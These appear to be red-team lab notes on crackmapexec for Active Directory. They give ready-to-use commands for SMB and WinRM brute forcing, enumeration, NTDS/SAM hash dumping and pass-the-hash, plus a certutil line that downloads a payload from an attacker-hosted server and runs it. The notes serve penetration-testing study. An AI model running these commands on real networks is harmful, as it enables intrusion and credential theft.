RedTeam
5.Machine
3.Active-Directory
General
Tools
TOP
1.crackmapexec

Main Purpose

CME provides a framework for running various external tools, including Mimikatz, Metasploit Shell, ...

Top Utility SMV ---> Own stuff using SMB LDAP ---> Own stuff using LDAP MSSQL ---> Own stuff using MSSQL SSH ---> Own stuff using SSH WINRM ---> Own stuff using WINRM Many more utilities...

General Commands

Commands

# Module
crackmapexec smb -L                         ---> List all the available modules
crackmapexec smb -m MODULE --options        ---> Print the options for the module
crackmapexec smb IP -u 'USER' -p'PASS' -m MODULE ---> Use the module






# Options
-t THREADS            set how many concurrent threads to use (default: 100)
--timeout TIMEOUT     max timeout in seconds of each thread (default: None)
--jitter INTERVAL     sets a random delay between each connection (default: None)
--darrell             give Darrell a hand
--verbose             enable verbose output

SMB

Command (Connection)

crackmapexec smb IP -u '' -p ''
  • -u ---> Username
  • -p ---> Passowrd

Trying NULL and guest username to login are a good thing to test when trying to connect to a target via SMB

Command (Brute Force)

crackmapexec smb IP -u USERNAMES.txt -p PASSWORD.txt --continue-on-success
  • -u ---> Usernames
  • -p ---> Passowrds
  • --continue-on-success ---> Continue enumaration after finding one valid user

Domain admin will be flag with the keyword (Pwn3d!)

Command (Shares Enumeration)

# Take note you need a valid account to perform the following
crackmapexec smb IP -u '' -p '' --shares
  • -u ---> Username
  • -p ---> Passowrd
  • --shares ---> Enumerate shares access (Show folders & permissions)

Command (User Enumeration)

# Take note you need a valid account to perform the following
crackmapexec smb IP -u 'Valid-User' -p 'Valid-Pass' --users
  • -u ---> Username
  • -p ---> Passowrd
  • --users ---> Command to list users

Command (Groups Enumeration)

# Take note you need a valid account to perform the following
crackmapexec smb IP -u 'Valid-User' -p 'Valid-Pass' --users
  • -u ---> Username
  • -p ---> Passowrd
  • --groups ---> Command to list groups

Command (Password Policy (length))

# Take note you need a valid account to perform the following
crackmapexec smb IP -u '' -p '' --pass-pol
  • -u ---> Username
  • -p ---> Passowrd
  • --pass-pol ---> Check the password policy (length)

Command (Check Current log-on sessions)

# Take note you need a valid account to perform the following
crackmapexec smb IP -u 'Valid-User' -p 'Valid-Pass' --sessions
  • -u ---> Username
  • -p ---> Passowrd
  • --sessions ---> Command to list current sessions

Command (Dump Hash | sam, lsa, ntds)

# Take note you need a valid account to perform the following
crackmapexec smb IP -u 'Valid-User' -p 'Valid-Pass' --ntds
  • -u ---> Username
  • -p ---> Passowrd
  • --ntds ---> Type of Hash (can use sam, lsa or ntds)

Difference between those elements The SAM file is a database that stores information about local user accounts on a Windows system. It is used to authenticate local users on the system and is typically stored on the system drive in the %SYSTEMROOT%\system32\config directory. Stores information about user accounts on a local computer, including their passwords and security identifiers (SIDs) ㅤ The LSA is a component of the Windows operating system that is responsible for handling security requests. It is responsible for authenticating users, granting access to resources, and enforcing security policies. The LSA is not a standalone file, but rather a component of the operating system. ㅤ The NTDS file is a database that stores information about objects in an Active Directory domain, including users, groups, and computers. It is used to authenticate users in an Active Directory domain and is typically stored on the system drive in the %SYSTEMROOT%\NTDS directory.

Command (Run Custom Command (Example MSFvenom payload))

# Take note you need a valid account to perform the following
crackmapexec smb IP -u 'Valid-User' -p 'Valid-Pass' -x 'certutil -urlcache -f http://IP:PORT/PAYLOAD_NAME.exe payload_name.exe && cmd /c payload_name.exe'
  • -u ---> Username
  • -p ---> Passowrd
  • -x ---> Command to run on the machine
    • IP:PORT ---> Port we are hosting the payload
    • cmd /c ---> Run the command (program)

Pass the Hash

crackmapexec smb IP -u USERNAME -H 32196B56FFE6F45E294117B91A83BF38 -x COMMAND

---> More information: [[3 - Authentication Relays (Responder)]]

Winrm

Command

# Brute Force
crackmapexec winrm IP -u 'administator' -p 'WORDLIST'

# Sign In testing and Commands
crackmapexec winrm IP -u 'USER' -p 'PASS' -x "ipconfig"
  • Possible to brute force it or simply check if a credential is valid
  • Possible to send command with valid credential

Check [[• Evil Winrm]] for the following of the exploitation

More Information

More information ---> https://wiki.porchetta.industries/ (opens in a new tab)